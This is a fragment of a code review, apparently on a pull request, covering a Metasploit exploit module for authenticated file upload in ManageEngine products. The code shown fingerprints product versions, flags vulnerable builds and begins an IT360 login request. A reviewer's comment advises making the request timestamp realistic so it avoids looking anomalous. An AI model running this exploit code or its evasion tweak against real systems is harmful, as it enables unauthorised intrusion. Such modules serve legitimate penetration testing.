modules/exploits/multi/http/manageengine_auth_upload.rb

```diff
@@ -0,0 +1,427 @@
+          version[2] = $1
+        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
+        res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+          output = $1
+          version = [ output[0], output[2], "0", "ae" ]
+        end
+        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
+        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
+        version[3] = "sc"
+        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
+          # ... but get the build number if we can find it
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
+        # IT360 newer versions
+        version[3] = "it"
+      end
+    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      # IT360 older versions, not a very good detection string but there is no alternative?
+      version[3] = "it"
+    end
+    return version
+  end
+
+
+  def check
+    version = get_version
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd is done)
+    if (version[0] <= "9" && version[0] > "4" && version[2] < "9031" && version[3] == "sd") ||    #sd was fixed on build 9031
+    (version[0] <= "6" && version[2] < "99999" && version[3] == "ae") ||
+    (version[3] == "sc" && version[2] < "99999")
+      return Exploit::CheckCode::Appears
+    end
+
+    if (version[2] > "9030" && version[3] == "sd") ||
+    (version[2] > "99999" && version[3] == "ae") ||
+    (version[2] > "99999" && version[3] == "sc")
+      return Exploit::CheckCode::Safe
+    else
+      # An IT360 check always lands here, there is no way to get the version easily
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def authenticate_it360(port, path, username, password)
+    if datastore['DOMAIN_NAME'] == nil
+      vars_post = {
+          'LOGIN_ID' => username,
+          'PASSWORD' => password,
+          'isADEnabled' => "false"
+      }
+    else
+      vars_post = {
+          'LOGIN_ID' => username,
+          'PASSWORD' => password,
+          'isADEnabled' => "true",
+          'domainName' => datastore['DOMAIN_NAME']
+      }
+    end
+
+    sd_port = datastore['RPORT']
+    datastore['RPORT'] = port
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(path),
+      'vars_get' => {
+        'service' => "ServiceDesk",
+        'furl' => "/",
+        'timestamp' => "14" + rand_text_numeric(11)
```

Comment:
It may make sense to use a more realistic timestamp, otherwise this may stand out as an anomaly.   ```Time.now.to_i``` is probably fine.